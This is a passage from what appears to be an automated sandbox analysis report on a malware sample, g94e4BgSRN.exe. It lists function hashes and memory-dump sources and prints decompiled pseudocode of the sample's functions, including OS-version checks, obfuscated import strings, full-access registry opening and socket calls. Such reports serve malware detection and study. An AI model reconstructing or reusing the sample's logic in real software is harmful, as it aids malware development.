                                                          • Opcode Fuzzy Hash: 0ac1b5565beb09a7e71f549c6c88f35ca7be6d1a8fe34b36811aeaed9e3cd55b
                                                          • Instruction Fuzzy Hash: C521A1715483809FDB02CF60D994752BFB1EF46324F28C1EAC8458F2A6C33AD84ACB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00AFD4C4, Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286122871.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_afd000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c87597c7ce232a8ba5166cc53f6e24082543c7c0c47f16e5a45fc5c63a8b190a
                                                          • Instruction ID: 1caadb37bfc68c1e1599bd1d6e2512c8bd38eee9c7eb8be36081c71a3c8e720d
                                                          • Opcode Fuzzy Hash: c87597c7ce232a8ba5166cc53f6e24082543c7c0c47f16e5a45fc5c63a8b190a
                                                          • Instruction Fuzzy Hash: CA212571500248EFDB12DF94D9C0B36BF66FB88328F24C969E9050B246C336D856DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B0D254, Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286137706.0000000000B0D000.00000040.00000001.sdmp, Offset: 00B0D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b0d000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cbbd332750f856d99d85839cced3589be90fc32565a791443b5b7a38979db22
                                                          • Instruction ID: 4ca08fb54116c2b678137c50ab8d3d6991355346c26a9ae5d4cb1db22f79dc28
                                                          • Opcode Fuzzy Hash: 4cbbd332750f856d99d85839cced3589be90fc32565a791443b5b7a38979db22
                                                          • Instruction Fuzzy Hash: F021F275604244EFDB01DF94D9C4B26BFA5FB84324F24C9A9E8494B2C2C736D856CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B0D09C, Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286137706.0000000000B0D000.00000040.00000001.sdmp, Offset: 00B0D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b0d000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4955f5fb73b844a9fc8e72516524ed768051ba5120bde31374d91c7d161e265
                                                          • Instruction ID: 971a58c600b122a2dd7b5f863ef39a3124616a2ff1fbb086f8154ee8a748c1a0
                                                          • Opcode Fuzzy Hash: f4955f5fb73b844a9fc8e72516524ed768051ba5120bde31374d91c7d161e265
                                                          • Instruction Fuzzy Hash: C3210071504204EFDB00DF94D9C4B26BFA5FB84324F20C9A9D8091B2D6CB3AD806CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00AFD4BF, Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286122871.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_afd000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99a32a7d7d1cfcf1930da1b599531ed67ae132be6af7876455120805dc7659c7
                                                          • Instruction ID: d57a7a595498f3cce48ead14ab953016b5dd8e7a452b2811cafeedc849f5f13c
                                                          • Opcode Fuzzy Hash: 99a32a7d7d1cfcf1930da1b599531ed67ae132be6af7876455120805dc7659c7
                                                          • Instruction Fuzzy Hash: 4711E676404284CFCF12CF50D5C4B26BF72FB84324F24C6A9E9450B656C336D85ACBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B0D24F, Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286137706.0000000000B0D000.00000040.00000001.sdmp, Offset: 00B0D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b0d000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: caa1c39115dec62f506acc3054851e9a84238c15f76b8172daeef6ab33a055d9
                                                          • Instruction ID: 14d26235e85ff264b3e7156aa1a94d9c06d35c01f5ebd2ab84852450746922c9
                                                          • Opcode Fuzzy Hash: caa1c39115dec62f506acc3054851e9a84238c15f76b8172daeef6ab33a055d9
                                                          • Instruction Fuzzy Hash: B2119D75504280DFDB11CF54D5D4B15FFA1FB84324F28CAADD8494B696C33AD84ACB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00AFD745, Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286122871.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_afd000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c5f8491a33f15af46f203e9233bf1d026781dca5f68ba38d62ab20b87ca22c2
                                                          • Instruction ID: 6fd1d1d48800182db29971c42b4385958489fb6181a9557d504c1aaeb119aa52
                                                          • Opcode Fuzzy Hash: 3c5f8491a33f15af46f203e9233bf1d026781dca5f68ba38d62ab20b87ca22c2
                                                          • Instruction Fuzzy Hash: 4A01F7714043489AEB12AFA5CDC4BB6BBECDF41368F18C95AFE041E246D7799844C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00AFD744, Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286122871.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_afd000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 193947904b25f9154977b8572522923aa4537dcf9fcdf7a63795221d52db7ccc
                                                          • Instruction ID: 24a8654022e6a3803398916849ef7ff6643afe27cba0119b3eec6a36715e1586
                                                          • Opcode Fuzzy Hash: 193947904b25f9154977b8572522923aa4537dcf9fcdf7a63795221d52db7ccc
                                                          • Instruction Fuzzy Hash: 53F062714043489EEB119F59CCC4B62FB9CEB81734F18C45AEE085F296C3799C44CAB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 00B6EA90, Relevance: .3, Instructions: 315COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15e364c17ab4421243eae39e3878d002fef44469c0a7b0772ce2090fca322aa1
                                                          • Instruction ID: 672456e7520feead8b67b344246491d8c08f9f735c88895d2f45491c4db350bb
                                                          • Opcode Fuzzy Hash: 15e364c17ab4421243eae39e3878d002fef44469c0a7b0772ce2090fca322aa1
                                                          • Instruction Fuzzy Hash: A412A2B14A2746EAD330CF65E9885893BA1F7C5328BD0420BD2615BAF0D7BC194BCF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B6CAD4, Relevance: .3, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d37420e7e1c7d1742b65c441b3ceb060ae02871b81e5e2043abcb97a1fab0173
                                                          • Instruction ID: a4245e26f1980044589f1edcb28e5780ca8153838234a9888e663db8d8221284
                                                          • Opcode Fuzzy Hash: d37420e7e1c7d1742b65c441b3ceb060ae02871b81e5e2043abcb97a1fab0173
                                                          • Instruction Fuzzy Hash: 15A16D36E002198FCF05DFA5C9445AEBBF6FF85300B1585AAE815BB261EB75E905CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B6EA80, Relevance: .2, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d660a977e76249f5eb035d154842158d413e7e8ed86af448bf45d8adb4307444
                                                          • Instruction ID: cb6c19bf87924a0bf7cd5183951f96f09721e746d18d5e4ac383511639d181ac
                                                          • Opcode Fuzzy Hash: d660a977e76249f5eb035d154842158d413e7e8ed86af448bf45d8adb4307444
                                                          • Instruction Fuzzy Hash: 4BC139B1862746ABD320CF65E9885897BB1FBC5328F90420BD2616B6F0D7BC1847CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: g94e4BgSRN.exe PID: 6976 Parent PID: 6384 g94e4BgSRN.exeCOMMON

                                                          Executed Functions

                                                          Function 004132E6, Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 45%
                                                          			E004132E6(void* __ecx, void* __edx) {
				char _v26;
				short _v28;
				intOrPtr _v164;
				char _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v208;
				char _v212;
				short _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v240;
				char _v244;
				void* _t46;
				void* _t48;
				intOrPtr* _t51;
				intOrPtr _t57;
				void* _t72;
				char _t75;
				char* _t77;
				void* _t78;
				void* _t79;
				intOrPtr _t81;
				void* _t83;
				char* _t84;
				intOrPtr* _t85;

				_t79 = __edx;
				_t78 = __ecx;
				_t85 =  &_v228;
				_t75 =  &_v168;
				_v228 = 0x9c;
				_v232 = 0;
				_v212 = 0;
				_v208 = 0;
				 *_t85 = _t75;
				_t46 = E004129E4();
				 *_t85 = _t75;
				_v168 = 0x9c;
				L0041F57C();
				_t83 = _t46;
				if(_t46 == 0) {
					_v240 = _t75;
					_v172 = 0x94;
					L0041F57C();
					_push(_t75);
					if(_t46 != 0) {
						L29:
						return 0;
					}
				}
				_t48 = E004081AA("Ed5LC542dMZ65dlXR8W");
				_t51 = E00407F8E(_t79, E00407F7A(_t79, E004081AA("wd0RdiNh.Sii")), _t48);
				if(_t51 == 0) {
					_v244 =  &_v212; // executed
					L0041F594(); // executed
				} else {
					_v244 =  &_v212;
					 *_t51();
				}
				_push(_t78);
				if(_t83 == 0 || _v164 != 2) {
					goto L29;
				}
				if(_v176 != 5) {
					L15:
					_t84 =  &_v220;
					_t77 =  &_v224;
					_v244 = _t84;
					 *_t85 = _t77;
					if(E0041328F() == 0 || _v224 != 6) {
						L25:
						_v244 = _t84;
						 *_t85 = _t77;
						if(E0041328F() == 0 || _v224 != 0xa || _v220 != 0) {
							goto L29;
						} else {
							return (0 | _v26 != 0x00000001) + (0 | _v26 != 0x00000001) + 0xd;
						}
					} else {
						_t57 = _v220;
						if(_t57 != 0) {
							if(_t57 != 1) {
								if(_t57 != 2) {
									if(_t57 != 3) {
										goto L25;
									}
									return (0 | _v26 != 0x00000001) + 0xb + (0 | _v26 != 0x00000001) * 2;
								}
								return (0 | _v26 != 0x00000001) + (0 | _v26 != 0x00000001) + 0xa;
							}
							return (0 | _v26 != 0x00000001) + 8;
						}
						return ((0 | _v26 == 0x00000001) - 0x00000001 & 0xfffffa07) + 0x600;
					}
				}
				_t81 = _v172;
				_t72 = 0x501;
				if(_t81 != 1) {
					if(_t81 != 2) {
						goto L15;
					}
					_t72 = 3;
					if(_v28 != 0x8000) {
						if(_v26 != 1) {
							L14:
							 *_t85 = 0x59;
							L0041F87C();
							_push(_t81);
							asm("sbb eax, eax");
							return _t72 + 5;
						}
						_t72 = 2;
						if(_v216 != 9) {
							goto L14;
						}
					}
				}
				return _t72;
			}































                                                          0x004132e6
                                                          0x004132e6
                                                          0x004132e8
                                                          0x004132ee
                                                          0x004132f2
                                                          0x004132fa
                                                          0x00413302
                                                          0x0041330a
                                                          0x00413312
                                                          0x00413315
                                                          0x0041331a
                                                          0x0041331d
                                                          0x00413325
                                                          0x0041332d
                                                          0x0041332f
                                                          0x0041336e
                                                          0x00413371
                                                          0x00413379
                                                          0x00413380
                                                          0x00413381
                                                          0x004134c6
                                                          0x00000000
                                                          0x004134c6
                                                          0x00413387
                                                          0x00413338
                                                          0x0041335a
                                                          0x00413365
                                                          0x00413389
                                                          0x0041338c
                                                          0x00413367
                                                          0x00413367
                                                          0x0041336a
                                                          0x0041336a
                                                          0x00413393
                                                          0x00413394
                                                          0x00000000
                                                          0x00000000
                                                          0x004133aa
                                                          0x0041340d
                                                          0x0041340d
                                                          0x00413411
                                                          0x00413415
                                                          0x00413419
                                                          0x00413423
                                                          0x00413495
                                                          0x00413495
                                                          0x00413499
                                                          0x004134a3
                                                          0x00000000
                                                          0x004134b3
                                                          0x00000000
                                                          0x004134c0
                                                          0x0041342c
                                                          0x0041342c
                                                          0x00413432
                                                          0x00413451
                                                          0x00413468
                                                          0x00413480
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0041348f
                                                          0x00000000
                                                          0x00413477
                                                          0x00000000
                                                          0x00413460
                                                          0x00000000
                                                          0x00413447
                                                          0x00413423
                                                          0x004133ac
                                                          0x004133b0
                                                          0x004133b8
                                                          0x004133c1
                                                          0x00000000
                                                          0x00000000
                                                          0x004133cd
                                                          0x004133d2
                                                          0x004133e0
                                                          0x004133f3
                                                          0x004133f3
                                                          0x004133fa
                                                          0x00413402
                                                          0x00413403
                                                          0x00000000
                                                          0x00413405
                                                          0x004133e8
                                                          0x004133ed
                                                          0x00000000
                                                          0x00000000
                                                          0x004133ed
                                                          0x004133d2
                                                          0x004134d0

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Ed5LC542dMZ65dlXR8W$wd0RdiNh.Sii
                                                          • API String ID: 0-2370874720
                                                          • Opcode ID: 46006a64fbda4bf4b3e9b0ffcf7154b995a5e1936410bb6f002cd3adb6ade318
                                                          • Instruction ID: aea862b3450ebf307a16053a8a3fc20b1df094ade6bc7c343729d6a33193dea1
                                                          • Opcode Fuzzy Hash: 46006a64fbda4bf4b3e9b0ffcf7154b995a5e1936410bb6f002cd3adb6ade318
                                                          • Instruction Fuzzy Hash: D7418E7040C7419AEB21AF21C5457AFBAE0AF81759F148E2FE4C487281D37D8AC98B5B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004130E8, Relevance: 2.5, Strings: 2, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$Unknown
                                                          • API String ID: 0-3125819936
                                                          • Opcode ID: 09c9c0a9f06fa941f3f5a46c28196dba5f2fafc07f774812d3ae38cfce7fc380
                                                          • Instruction ID: 75a62b7ad59212d7e7d3757252a2119b8f15ada3fb68da9ed8f134ad780259a0
                                                          • Opcode Fuzzy Hash: 09c9c0a9f06fa941f3f5a46c28196dba5f2fafc07f774812d3ae38cfce7fc380
                                                          • Instruction Fuzzy Hash: 830108B0409341AED320AF26D94479BFBE4BBD4714F008A1EE49847290D37985498B97
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405FBE, Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cef1c203a13e6339b71b227b83384d952d40f96f061476ba986419ca8909447b
                                                          • Instruction ID: 50f9dbed06e6853259d32925d3d8c4084038ba02febeb7ff5867e9cbce9530da
                                                          • Opcode Fuzzy Hash: cef1c203a13e6339b71b227b83384d952d40f96f061476ba986419ca8909447b
                                                          • Instruction Fuzzy Hash: 1DF0F9B49087458BD300FF3DC44521ABAE1BF88328F558A3EE499E3395E63CC5558E07
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D7D, Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -
                                                          • API String ID: 0-2547889144
                                                          • Opcode ID: 772a2119c266b746b4a9d798261a1b96d186bc9b60f73d726c78d5d6e4f8f310
                                                          • Instruction ID: 542a74277ee6daf56934a715b94c3cb6415021c893f49c4910618d7e1c795e3b
                                                          • Opcode Fuzzy Hash: 772a2119c266b746b4a9d798261a1b96d186bc9b60f73d726c78d5d6e4f8f310
                                                          • Instruction Fuzzy Hash: 8B416E70608B008FC720EF69D48461BBBE4EF85324F518A3FE994A73D1C77899458F9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00410608, Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 91%
                                                          			E00410608(signed int __ecx, char _a4, intOrPtr _a8) {
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t41;
				intOrPtr* _t43;

				_t35 = 0;
				_v44 = 0;
				_v52 = 0;
				_v56 = 0xf003f;
				_v60 = 0;
				_v48 =  &_v16;
				_v64 = 0;
				_v68 = 0;
				_v72 = _a8;
				_t27 = _a4;
				_v76 = _t27; // executed
				L0041F454(); // executed
				_t43 = _t41 - 0x20;
				if(_t27 == 0) {
					asm("repne scasb");
					_v104 = 0;
					_v96 = _v16;
					_v92 =  !(__ecx | 0xffffffff) - 1;
					_v100 = _v20;
					_v108 = _v24;
					_t33 = _v52;
					 *_t43 = _t33; // executed
					L0041F41C(); // executed
					_t43 = _t43 - 0x18;
					_t34 = _v76;
					_t35 = 0 | _t33 == 0x00000000;
					 *_t43 = _t34; // executed
					L0041F45C(); // executed
					_push(_t34);
				}
				return _t35;
			}

























                                                          0x0041060a
                                                          0x00410613
                                                          0x0041061b
                                                          0x00410623
                                                          0x0041062b
                                                          0x00410633
                                                          0x0041063b
                                                          0x00410643
                                                          0x0041064b
                                                          0x0041064f
                                                          0x00410653
                                                          0x00410656
                                                          0x0041065b
                                                          0x00410660
                                                          0x0041066b
                                                          0x00410671
                                                          0x0041067c
                                                          0x00410684
                                                          0x00410688
                                                          0x00410690
                                                          0x00410694
                                                          0x00410698
                                                          0x0041069b
                                                          0x004106a0
                                                          0x004106a5
                                                          0x004106a9
                                                          0x004106ac
                                                          0x004106af
                                                          0x004106b4
                                                          0x004106b4
                                                          0x004106bc

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ?
                                                          • API String ID: 0-1684325040
                                                          • Opcode ID: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
                                                          • Instruction ID: d7b5c200bfe116dfd6f132702afe2373019979046eeb2612c7d3539b4a1fd506
                                                          • Opcode Fuzzy Hash: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
                                                          • Instruction Fuzzy Hash: 6111B0B45083419FD340EF69D59475BFBE0BB88354F40892EF89883351E7B9D5898F86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041328F, Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E0041328F() {
				intOrPtr* _v4;
				intOrPtr* _v8;
				char _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _t10;
				intOrPtr _t12;
				void* _t15;
				intOrPtr* _t18;
				intOrPtr* _t19;

				_t10 =  &_v16;
				_v40 = 0x66;
				 *_t18 = 0;
				_v16 = 0;
				_v36 = _t10;
				L0041F69C(); // executed
				_t15 = 0;
				_t19 = _t18 - 0xc;
				if(_t10 == 0) {
					_t12 = _v28;
					 *_v4 =  *((intOrPtr*)(_t12 + 0x10));
					 *_v8 =  *((intOrPtr*)(_t12 + 0xc));
					 *_t19 = _t12;
					L0041F6A4();
					_push(_t12);
					_t15 = 1;
				}
				return _t15;
			}














                                                          0x00413292
                                                          0x00413296
                                                          0x0041329e
                                                          0x004132a5
                                                          0x004132ad
                                                          0x004132b1
                                                          0x004132b6
                                                          0x004132b8
                                                          0x004132bd
                                                          0x004132bf
                                                          0x004132ca
                                                          0x004132d3
                                                          0x004132d5
                                                          0x004132d8
                                                          0x004132dd
                                                          0x004132de
                                                          0x004132de
                                                          0x004132e5

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: f
                                                          • API String ID: 0-1993550816
                                                          • Opcode ID: adce9d268615c65e9b031c2403f5ee47e1848614fcce32b1b10be943295c3ccf
                                                          • Instruction ID: bf6d1e5e530aa92c88c9cb547170410969f3c4ca1d96cbd027a6ecb1b54c6bd2
                                                          • Opcode Fuzzy Hash: adce9d268615c65e9b031c2403f5ee47e1848614fcce32b1b10be943295c3ccf
                                                          • Instruction Fuzzy Hash: 19F0F8B45083018FC704EF25C185B5BBBE1BF88304F40886DE88487354D379D58ACB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004059D3, Relevance: .2, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 20%
                                                          			E004059D3(signed int __ecx, signed int _a4, signed int _a8) {
				char _v44;
				char _v48;
				signed int _v60;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				void* __ebp;
				signed int _t57;
				intOrPtr _t61;
				signed int _t63;
				intOrPtr _t71;
				signed int _t73;
				intOrPtr _t77;
				intOrPtr _t83;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				char* _t93;
				char* _t94;
				char* _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int* _t100;
				void* _t101;
				intOrPtr* _t102;

				_t88 = __ecx;
				_t100 =  &_v60;
				_t87 = _a4;
				_t97 = _a8;
				_v48 = 0xffffffff;
				if(E00408E53() != 4) {
					if(E00408E53() != 2) {
						_t93 =  &_v44;
						_v72 = _t97;
						 *_t100 = _t87;
						_v68 = _t93;
						_t57 = E004051B5(__ecx, _t90);
						if(_t57 != 0) {
							_v68 = 6;
							_v72 = 1;
							 *_t100 = 2; // executed
							L0041F8E4(); // executed
							_t101 = _t100 - 0xc;
							_v60 = _t57;
							if(_t57 == 0xffffffff) {
								goto L28;
							}
							_v80 = 0x10;
							_v84 = _t93;
							_v88 = _t57; // executed
							L0041F93C(); // executed
							_t102 = _t101 - 0xc;
							if(_t57 != 0) {
								L12:
								 *_t102 =  &_v72;
								_t57 = E00405999(_t90);
								goto L28;
							}
							L31:
							return _v72;
						}
						L28:
						return _t57 | 0xffffffff;
					}
					if( *0x42b300 == 0) {
						 *0x42b300 =  *0x42b304;
					}
					_t94 =  &_v44;
					_t98 =  &_v48;
					while(1) {
						_t61 =  *0x42b300;
						if(_t61 == 0) {
							goto L31;
						}
						_v68 = _t94;
						_t91 =  *((intOrPtr*)(_t61 + 0x44));
						 *_t100 = _t61 + 4;
						_v72 =  *((intOrPtr*)(_t61 + 0x44));
						_t63 = E004051B5(_t88,  *((intOrPtr*)(_t61 + 0x44)));
						if(_t63 == 0) {
							L26:
							 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
							continue;
						}
						_v68 = 0;
						_v72 = 1;
						 *_t100 = 2;
						L0041F8E4();
						_v80 = 0x10;
						_v84 = _t94;
						_v88 = _t63;
						_v60 = _t63;
						L0041F93C();
						_t100 = _t100;
						if(_t63 == 0) {
							_v88 = _t97;
							_v92 = _t87;
							_v96 =  *0x42b300;
							 *_t100 = _v72;
							if(E004058E9(_t98) == 0) {
								goto L23;
							}
							goto L31;
						}
						L23:
						 *_t100 = _t98;
						E00405999(_t91);
						goto L26;
					}
					goto L31;
				}
				if( *0x42b300 == 0) {
					 *0x42b300 =  *0x42b304;
				}
				_t95 =  &_v44;
				_t99 =  &_v48;
				while(1) {
					_t71 =  *0x42b300;
					if(_t71 == 0) {
						goto L31;
					}
					_v68 = _t95;
					_t92 =  *((intOrPtr*)(_t71 + 0x44));
					 *_t100 = _t71 + 4;
					_v72 =  *((intOrPtr*)(_t71 + 0x44));
					_t73 = E004051B5(_t88,  *((intOrPtr*)(_t71 + 0x44)));
					if(_t73 == 0) {
						L15:
						 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
						continue;
					}
					_v68 = 0;
					_v72 = 1;
					 *_t100 = 2;
					L0041F8E4();
					_v80 = 0x10;
					_v84 = _t95;
					_v88 = _t73;
					_v60 = _t73;
					L0041F93C();
					_t100 = _t100;
					if(_t73 != 0) {
						L14:
						 *_t100 = _t99;
						E00405999(_t92);
						goto L15;
					}
					_t92 =  *0x42b300;
					_t77 =  *((intOrPtr*)(_t92 + 0x88));
					_t88 =  *((intOrPtr*)(_t77 + 0x44));
					_v96 = _t92;
					_v92 = _t77 + 4;
					_v88 =  *((intOrPtr*)(_t77 + 0x44));
					 *_t100 = _v72;
					if(E004058E9(_t99) == 0) {
						goto L14;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
						_t90 =  *0x42b300;
						if(_t90 == 0) {
							goto L31;
						}
						_t83 =  *((intOrPtr*)(_t90 + 0x88));
						_t89 = _v72;
						if(_t83 == 0) {
							_v88 = _t97;
							_v92 = _t87;
						} else {
							_v92 = _t83 + 4;
							_v88 =  *(_t83 + 0x44);
						}
						_v96 = _t90;
						 *_t100 = _t89;
						if(E004058E9(_t99) != 0) {
							continue;
						} else {
							goto L12;
						}
					}
					goto L31;
				}
				goto L31;
			}

































                                                          0x004059d3
                                                          0x004059d7
                                                          0x004059da
                                                          0x004059de
                                                          0x004059e2
                                                          0x004059f2
                                                          0x00405b38
                                                          0x00405c00
                                                          0x00405c04
                                                          0x00405c08
                                                          0x00405c0b
                                                          0x00405c0f
                                                          0x00405c16
                                                          0x00405c1d
                                                          0x00405c25
                                                          0x00405c2d
                                                          0x00405c34
                                                          0x00405c39
                                                          0x00405c3f
                                                          0x00405c43
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c45
                                                          0x00405c4d
                                                          0x00405c51
                                                          0x00405c54
                                                          0x00405c59
                                                          0x00405c5e
                                                          0x00405af8
                                                          0x00405afc
                                                          0x00405aff
                                                          0x00000000
                                                          0x00405aff
                                                          0x00405c64
                                                          0x00000000
                                                          0x00405c64
                                                          0x00405c18
                                                          0x00000000
                                                          0x00405c18
                                                          0x00405b45
